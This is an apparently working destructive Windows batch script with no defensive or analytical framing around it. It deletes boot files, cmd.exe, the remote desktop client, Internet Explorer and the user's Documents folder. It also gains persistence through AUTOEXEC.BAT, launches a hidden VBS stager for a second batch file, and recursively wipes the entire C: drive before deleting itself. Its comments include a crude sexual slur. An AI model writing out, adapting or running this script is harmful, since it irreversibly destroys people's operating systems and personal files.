C:\Windows\Boot del C:\Windows\Boot Erase /F /S /Q C:\Windows Boot :: ENSURED SECONDS WAVE DESTRUCTION Attrib "C:\Program Files\Internet Explorer\iexplore.exe" -r -s -h Del /F /Q "C:\Program Files\Internet Explorer\iexplore.exe" Attrib "C:\Windows\system32\cmd.exe" -r -s -h Del /F /Q "C:\Windows\system32\cmd.exe" Attrib "C:\Windows\system32\mstsc.exe" -r -s -h Del /F /Q "C:\Windows\system32\mstsc.exe" Attrib "%homedrive%\Users\%username%\Documents" -r -s -h Set "docs=%homedrive%\Users\%username%\Documents" For %%X In (%docs%) Do ( Del /F /Q %docs%\*.* ) Del /F /Q "%homedrive%\Users\%username%\Documents\*.*" Del /F /Q "%homedrive%\Users\%username%\Documents" :: FREEZE COMPUTER if exist "%systemdrive%\AUTOEXEC.BAT" ( copy %0 "%systemroot%\%0" echo start "" "%systemroot%\%0" >> %systemdrive%\AUTOEXEC.BAT ) echo Overwrite! rundll32 user,disableoemlayer >%0 :: Final Rape @echo Set wshShell=wscript.CreateObject("WScript.Shell") >Start_nc.vbs @echo wshshell.run "%programfiles%\nukechild.bat", 0 >>Start_nc.vbs Attrib Start_nc.vbs +H +R Start Start_nc.vbs echo y | del c:\*.* /f /q /s Del /F /Q %0 @exit /b